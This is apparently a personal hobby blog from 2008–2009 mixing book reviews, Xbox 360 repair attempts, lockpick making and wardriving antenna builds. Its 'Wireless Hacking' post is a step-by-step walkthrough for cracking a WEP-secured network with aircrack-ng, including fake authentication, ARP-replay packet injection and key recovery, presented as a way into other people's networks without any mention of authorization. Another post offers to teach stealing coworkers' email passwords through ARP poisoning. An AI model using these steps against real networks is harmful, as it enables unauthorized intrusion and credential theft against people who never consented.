teh_Commissioner

Books...

2009-02-05T16:47:00.004-07:00

From the comments that I received, it looks like people want me to do some book reviews.

I have not been able to read as much lately as I would like (school, work, Libby, and Xbox keep me pretty busy), but books are still one of my most favorite things in life.

I'm going to start off with a short list of books I've read in the last few months, then I'll list all the books that are on my list to read.

1. War and Peace - Leo Tolstoy

Amazing book! Tolstoy has such a depth to his writing it is incredible. He explains every little detail every character is facing to the point where sometimes it starts getting boring, but you keep reading because you love being in the same place with Pierre, Prince Andrei, and Natasha. Because that is what his writing does is bring you into their world. You know exactly what is going on all time with everyone in such detail, it's impossible to explain or relate to someone else about. I would recommend this book to everyone, no matter what their reading level. It's not written at an advanced level, but can be confusing with all the attention to detail and the number of characters. It was a little difficult at first for me, but now it is refreshing to read and will be hard to go back to regular old novels.

2. Brave New World - Aldous Huxley

Very, very interesting book. Huxley separates himself from the typical "doomsday" authors like Orwell, and gives us a look into the future of what humans will do to have the "perfect society." Instead of the government taking control and regulating everything to how they like it and the rest of the population serves them (Sound like Congress to anyone? But I digress...), everyone is "programmed" before birth, while they are still embryos (everyone is born from a tube rather than by an actual mother), and are made into certain class or rank. The workers are naturally not as smart and are bred to work wherever they are needed (if they are needed to work someplace hot, they are made to adjust to and even like the heat before they are even born). The most impressive part of the story is how the different classes all love what they do because that is what they were made for. It starts getting interesting when a young man who was raised on an indian reservation (with no knowledge of the outside world) comes into contact with the world and tries to change it by himself.

3. Animal Farm - George Orwell

This book scares me everytime I read it. If you haven't read it, PLEASE READ IT!!1!oneone. All I'm going to say is that this book tells exactly what happens when the working class is ignorant: not only of what the government is doing, but of the past. Be an educated individual please!

Here are the books I'm either reading right now or are on my list to read or re-read (in no particular order). If you have any recommendations, please let me know!

1. Atlas Shrugged - Ayn Rand
2. The Fountainhead - Ayn Rand
3. Dead Souls - Nikolai Gogol
4. The Devils - Fyodor Dostoevsky
5. Crime and Punishment - Fyodor Dostoevsky
6. The Brothers Karamazov - Fyodor Dostoevsky
7. The Idiot - Fyodor Dostoevsky
8. Anna Karenina - Leo Tolstoy
9. The House of the Dead - Fyodor Dostoevsky
10. Jude the Obscure - Thomas Hardy
11. Slaughterhouse 5 - Kurt Vonnegut
12. The Wealth of Nations - Adam Smith
13. How to Win Friends and Influence People - Dale Carnegie
14. The Illiad - Homer
15. Catch-22 - Joseph Heller
16. Fahrenheit 451 - Ray Bradbury
17. 1984 - George Orwell
18. The Great Divorce - C.S. Lewis
19. Mere Christianity - C.S. Lewis
20. A Tale of Two Cities - Charles Dickens
21. Oliver Twist - Charles Dickens
22. Great Expectations - Charles Dickens
23. Nicholas Nickleby - Charles Dickens
24. The House of Mirth - Edith Wharton
25. Wuthering Heights - Emily Brontë
26. David Copperfield - Charles Dickens

So there you go! Hopefully I'll be able to read them all in my lifetime!!

Requests

2009-02-04T15:50:00.000-07:00

So there are some people out there who think my blog is out of date since I havent updated it since October... so, I'm taking requests for what people want to see next on teh blog.

So I can go into getting e-mail passwords from your friends at work by simple ARP poisoning or maybe you want me to teach you how to crack WPA secured wi-fi networks.

Perhaps you want me to review video games I have played recently or even recommend some good books I've read in the past little while.

Whatever it is, just let me know. I give teh peoples what they want!

Thanks for reading!

Making your own Lockpicks

2008-10-16T10:23:00.002-06:00

Another random hobby of mine is lockpicking. I love it because it goes hand in hand with hacking. Your just hacking the real world, lol.

So if you want to make your own lockpicks, I find it easiest if you already have a set that you can use as a model or template for your new and improved ones. I already have the Credit Card Lock Pick kit that you can find here. It's pretty much the best thing ever and you can take it wherever you go!

Now, you are going to need a rotary tool of some type (Dremel tool), vice grips, safety glasses, a street sweeper bristle to make the pick out of, and you can optionally have a bench grinder as well.

Now, I'll let the photo's do the instruction. It's pretty simple, you just need to be careful not to grind away at the original picks.

I like to use both sides of the bristle since they can be hard to come by sometimes.

Then, polish it up, and you've got yourself a new shiny lockpick!

Now for the tension wrench, it's pretty simple. You can do it one of two ways.

I like to heat it up at the bending point (street sweeper bristle can be brittle sometimes, so this keeps it from breaking on you when you bend it at 90 degrees).

Did I mention that I like fire?

Make your bends, and then yours will look like one of these two designs.

These are both pretty rudimentary, but will work fine. You can make the blades to your preference, I like to have the option of one long and one short.

And there you have it! If you would like to learn how to lock pick, check out this article: MIT Guide to Lockpicking. (PDF format)

Wireless Hacking

2008-10-09T08:15:00.014-06:00

I've been getting a lot of questions lately about hacking secure wireless networks. The process is pretty simple if you are hacking a WEP secured network. So we'll start with that.

First off, you will need the right equipment. First off, you will need to download the right software for the job. I think that Backtrack is the best choice. It is a bootable Linux live CD that has almost every security/pen-testing program that you will ever need (I do wish it came with Nessus though). You can download Backtrack as an .ISO and burn it to a blank CD-R using Nero or Roxio. Be careful that you don't just burn it to the disc, instead there will probably be an option for burning an image somewhere in the options. If you get lost, you can follow this tutorial: http://www.petri.co.il/how_to_write_iso_files_to_cd.htm

I mentioned briefly in my post about wireless antennas what kind of wireless card that you will want to be using. You will need a card that supports both monitor mode and make sure that it is able to "inject" packets. Without either of these features, you will not be hacking any one's network. You also need to make sure that it is supported be aircrack-ng. Check here if you are not sure if your card will work or not.

So now, once you have a compatible card and Backtrack burned to a disc, let's boot it up and see what we can do. For this part, we are going to be finding out information about the target network. We will need to know the following things from the network you want to hack: the SSID, the MAC address of the access point/router, what channel it is broadcasting on, what other computers are connected to it. We will find this all out from a program that is included in the aircrack-ng suite; It's called airodump-ng.

First, find out what device backtrack is assigning as your wireless card. You will find that out by typing "iwconfig" at the command prompt:


root@tehCommissioner:/root# iwconfig
lo        no wireless extensions.
 
eth0      no wireless extensions.
 
ath0    IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

From this command, we learn that anything that doesn't say "no wireless extentions." is a wireless card. In this example, the ath0 is that card we will be using, but sometimes it can be wifi0, eth1, wlan0, ect. There isn't just one name that it will be.

Next, put the card into monitor mode with airmon-ng:


root@tehCommissioner:/root# airmon-ng start wifi0

 Interface       Chipset         Driver
 
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Now, we can start cracking...

We will want to survey the area to find out information about the networks, so fire up airodump-ng.


root@tehCommissioner:/root# airodump-ng ath0

 CH  9 ][ Elapsed: 1 min ][ 2008-10-09 08:41 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              NETGEAR                         
 00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear 
 00:14:6C:7E:40:80   32 100      752       73    2   9  54  WPA  TKIP   PSK  teddy                             
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51     2       14
 (not associated)   00:14:A4:3F:8D:13   19     0        4  mossy 
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5
 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0       99  teddy

In the top section, the BSSID section is what the MAC address is of the access point that is broadcasting. The ESSID section is what the network name is (what you will see in M$ Windows when you try and connect to it). The ENC section tells us what type of encryption it is using, whether it is WEP or WPA. And the last piece of information we will need from the top section is the CH column. It tells us what channel the network is being broadcasting on.
To bottom section tells us what computers are connected to which access points. We need a computer connected to the target AP or it gets more complicated trying to hack it. The more traffic that the target AP is handling, the faster the process will go. I like to keep a text editor open and keep all this information in there so that I can go to it for quick and easy reference throughout the whole process.

The only network that has WEP encryption here in our example is the one named bigbear. So we will tell airodump-ng to filter out all other networks and just focus on bigbear, and to collect all of the weak IV keys (these are what are used to crack the key). So this is what we would type in the command line:


root@tehCommissioner:/root# airodump-ng -c 9 --bssid 00:14:6C:7A:41:81 -w capturefile.cap --ivs ath0

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7A:41:81   42 100     5240       07  338   9  54  WEP  WEP         bigbear                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7A:41:81  00:0F:B5:32:31:31   42     0       14
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1     0        5

Now, open up a new tab in your teminal window, or just open a new window. We will begin injecting packets with aireplay-ng.

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.

To associate with an access point, use fake authentication:


root@tehCommissioner:/root# aireplay-ng -1 0 -e bigbear -a 00:14:6C:7A:41:81 -h 00:0F:B5:88:AC:82 ath0

09:18:20  Sending Authentication Request
09:18:20  Authentication successful
09:18:20  Sending Association Request
09:18:20  Association successful :-)

-1 means fake authentication, 0 reassociation timing in seconds, -e bigbear is the wireless network name, -a 00:14:6C:7A:41:81 is the access point MAC address, and -h 00:0F:B5:88:AC:82 is our card MAC addresss (you find this by typing ifconfig ath0, or whatever your wireless card device is, at the command prompt).

Now the injection begins! With your airodump-ng still running in the backround, type the following command in the console:


root@tehCommissioner:/root# aireplay-ng -3 -b 00:14:6C:7A:41:81 -h 00:0F:B5:88:AC:82 ath0

-3 means you will be doing a standard ARP-request replay attack, -b 00:14:6C:7A:41:81 is the access point MAC address, and -h 00:0F:B5:88:AC:82 is our card MAC addresss.

It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it.

Now leave this running, and go back to the tab or window that is running airodump-ng. You should see in a very little time in the #/s section the number of packets climbing really fast. Once you have about 100,000 of these. You can kill the both the airodump-ng and aireplay-ng programs and try and crack the key. I have cracked keys with as little as 40,000 packets.

To crack the key, we will be using aircrack-ng. We will want to point it to the file we created with airodump-ng, which was called capturefile.cap. So the command would look like this:


root@tehCommissioner:/root# aircrack-ng capturefile.cap

                                              Aircrack-ng 0.9
 
 
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
 
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Probability: 100%

Congradulations! You've successfully cracked a WEP key! If you have more questions, head over to the aircrack-ng main site where they have tutorials, help files, and links to a lot of other helpful resources. You can find it here

Final Xbox360 update :'(

2008-09-12T17:06:00.004-06:00

Well it's been a long battle, but I think I've finally lost...

We didn't know whether the firmware chip or the circuit board was bad on the DVD drive, so we soldered the firmware chip on another DVD drive we had lying around.

We plugged it into the computer, and mtkflash had absolutely no problems identifying the drive and subsequently was able to dump the firmware no problem. At this point, I was pretty excited. If this works then we will be able to get the drive key and put it into the new DVD drive and I'll be home free! But it was not meant to be. The firmware dump is pooched and we are unable to get the drive key from it. We tried dumping it about 20 times, and it still didn't work.

So, we tried going through the firmware file with a hex editor manually looking for the key, but we were unsuccessful. It almost seemed like the data in Bank0 of the dump was copied into all the other banks, thus causing all the corruption. So basically banks1-3 (or is it 4?) had the same data that bank0 had instead of what should have been there. The key is stored in bank0, but it was itself corrupted, so what we had was 4 copies of a corrupted bank on the firmware chip.

The corruption could have occurred before I bought the XB, or it might have been when we were using the heat gun to get it off. Unfortunately I'm out about $50 on the project, so maybe I'll just wait and buy a new one instead of getting hosed on eBay again!

Fun with Wi-Fi

2008-08-23T18:44:00.007-06:00

As many of you know I'm a big fan of something called wardriving. It's not illegal and it's not hacking! It is fun though. Unfortunately gas is a killer and it is hard to justify wardriving when I cant afford it! Anyways, wardriving requires certain equipment: laptop, wireless card, external antenna, and a GPS if wanted.

What kind of laptop you use is your choice, but what kind of wireless card you use is very important. If you have a laptop that has a PCMCIA slot in it, I would recommend using the Orinoco Gold card. If you are like me, you have a newer laptop that doesn't have a PC Card slot, so we have to go with a USB card. I use the Hawking HWUG1. Both of these cards are good not only for wardriving, but also for hacking. Ultimately though you will want to get a card with a chipset that is supported by a program called aircrack-ng. This is because if it is supported with aircrack-ng, it will work fine in Kismet. Here is the supported chipsets for aircrack-ng.

For the external antenna, you can spend lots of money buying antennas, or you can just build your own. There are some really simple designs out there that are really easy and most importantly cheap!

Take for example the Spider Antenna:

This is a incredibly simple design that took almost no time or effort to make. You can get the information on it here. This antenna will probably not get you a whole lot of gain, but the advantage is that you get to run a pigtail (cable to go from your wireless card to the antenna) that will allow you to put the antenna out the window. This is important because the car destroys your signal.

My favorite is the Pringles can Antenna:

I got the design for this one from here. The site has excellent instructions on how to make it and what supplies you need.

Just recently I modified the design a little bit and took a regular D-Link RP-SMA antenna and stripped off all of the coating as far as I could and connected it to a pringles can. It is basically the same as the other antenna, but is far more bootleg and now has a RP-SMA connector instead of an N connector. This saves me from running a coaxial pigtail (which has a lot of signal loss). Now I just run a standard USB extension cable. It works just as well or better than the other one I built.

The software that you use for wardriving is pretty important. For Windows you can use Netstumbler (which won't work in Vista, so you will need VistaStumbler). For Linux, you can use Kismet. Kismet is more powerful and I believe is much better overall. If you don't want to install linux on your computer, there is an awesome "LiveCD" you can download called Backtrack, which includes everything you will ever need for security software in Linux. Just download that, burn it to a CD and then reboot your laptop and it will boot up to Linux from the CD. When you are done just restart and eject your CD tray and it will boot right back into Windows. It works really well.

Here is a screenshot of a wardrive I went on a few years ago:
http://farm4.static.flickr.com/3258/2790541821_3e3f5398d0_o_d.png

New developments

2008-08-23T18:08:00.006-06:00

Well, instead of getting a new SATA controller to get everything going on my xb360, I thought that I would do some more digging around. I was led to a program called iprep. It automatically hex edits mtkflash, and then makes a bootable flash drive for you. Awesome little program.

So I plugged in the original xb DVD drive into the PC and tried with the new program. Still no luck... So I figured that I should try and see if the spare DVD drive I have would work. It worked great! I was able to dump the flash with no problems.

I figured that there must be something wrong with the original drive, so I opened it up and found something interesting...

Doesn't look good 'eh? So, I'm not sure what to do at this point. I can't get the key without getting the firmware, and I can't get the firmware if the program can't find that the drive is plugged in. Maybe I can resolder it, but that might be pretty complicated...

To see pictures from the process, click here!

Xbox360 woes...

2008-08-22T10:22:00.010-06:00

Since I'm not a big console gamer (I prefer the keyboard and mouse for games), getting an Xbox wasn't that high of importance to me, but I still wanted to get one because it would look sweet on my projector.

My little brother has a lot of experience modding the 360 and he had some extra parts lying around, so I decided that I would build one myself. I ordered a 360 motherboard off of eBay, and found that it had the Red ring of death (Wikipedia entry). So, I tried using this walkthrough to get it working. Unfortunately, it didn't work. So I bought another 360 on eBay (not a red ring of death one).

This new one has a problem with the DVD drive in it. When the Xbox turns on, there is an error that pops up (E 64). If I unplug the DVD drive, then it gets into the dashboard just fine. Luckily I have an extra DVD drive, so all I have to do is get the drive key from the broken drive and reflash the firmware in the new one with that key (This is because every Xbox DVD drive has a unique key that matches with the motherboard, so if I just throw in a new DVD drive and the key doesn't match, I will not be able to play games...). To do this, you have to plug the drive into a desktop PC via a SATA cable. But it's kind of awkward because the power port on the DVD drive is proprietary to xbox, which means that you have to have it powered by the xbox and at the same time the SATA cable has to be plugged into the PC.

Then you have to make either a floppy drive or a USB thumb drive bootable to DOS and run a program called "mtkflash" from DOS. This will allow you to dump the firmware. Then you boot back up into Windows and run a program called "Xbox 360 Firmware Toolkit" to get the drive key. Then you go back to DOS, get the firmware from the new drive, go to windows, change the key, then back to DOS to reflash the firmware.

Unfortunately for me, the SATA controller on my motherboard isn't supported on mtkflash, and even though I edited the .exe file with my hex editor to make it support my SATA chipset(How to fix 'No Drive Detected' in MTKFLASH.EXE). So I need to get a PCI SATA controller that will work with the program before I can get it working... :(

So once I get one, I will tell you if I can get this one working...

Blogging

2008-08-22T10:02:00.003-06:00

Well, I decided to jump on the Blog bang wagon and try it out. We'll see how that works! For those of you who don't know me I like to do a lot of hacking with electronics (hacking isn't necessarily breaking into other people's computers! http://en.wikipedia.org/wiki/Hacker_(hobbyist)). So I will probably write articles on the random stuff that I build and modify. Hopefully my peeps get something out of it!